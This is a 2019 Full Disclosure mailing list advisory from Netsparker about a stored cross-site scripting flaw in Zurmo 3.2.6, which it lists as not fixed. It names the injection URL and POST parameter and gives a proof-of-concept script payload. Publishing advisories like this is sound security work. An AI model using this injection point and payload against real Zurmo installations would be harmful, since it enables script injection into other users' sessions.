[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAKD6+R6-VWJY6N=1uj5Cs6Njb_9B4WvipK=16X0mXLEcKfRZdg@mail.gmail.com>
Date: Thu, 25 Jul 2019 11:39:41 +0200
From: Daniel Bishtawi <daniel@...sparker.com>
To: fulldisclosure@...lists.org, vuln@...unia.com,
submissions@...ketstormsecurity.org
Subject: [FD] Stored Cross-site Scripting Vulnerability in Zurmo 3.2.6
Hello,
We are informing you about the vulnerabilities in Zurmo 3.2.6.
Here are the details:
Information
--------------------
Advisory by Netsparker
Name: Stored Cross-site Scripting in Zurmo
Affected Software: Zurmo
Affected Versions: 3.2.6
Homepage: http://zurmo.org
Vulnerability: Stored Cross-site Scripting
Severity: Medium
Status: Not Fixed
Netsparker Advisory Reference: NS-19-010
Technical Details
--------------------
URL : http://{DOMAIN}/zurmo/app/index.php/zurmo/group
Injection URL : http://{DOMAIN}/zurmo/app/index.php/zurmo/group/edit?id=11
Parameter Name : Group_bname%5d
Parameter Type : POST
Attack Pattern : <scRipt>alert(‘storedXSS’)</scRipt>
For more information:
https://www.netsparker.com/web-applications-advisories/ns-19-010-stored-cross-site-scripting-in-zurmo/
Regards,
Daniel Bishtawi
Marketing Administrator | Netsparker Web Application Security Scanner
Follow us on Twitter <https://twitter.com/netsparker> | LinkedIn
<https://www.linkedin.com/company/netsparker-ltd> | Facebook
<https://facebook.com/netsparker>
<https://www.netsparker.com/blog/events/exhibiting-black-hat-usa-2019/>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists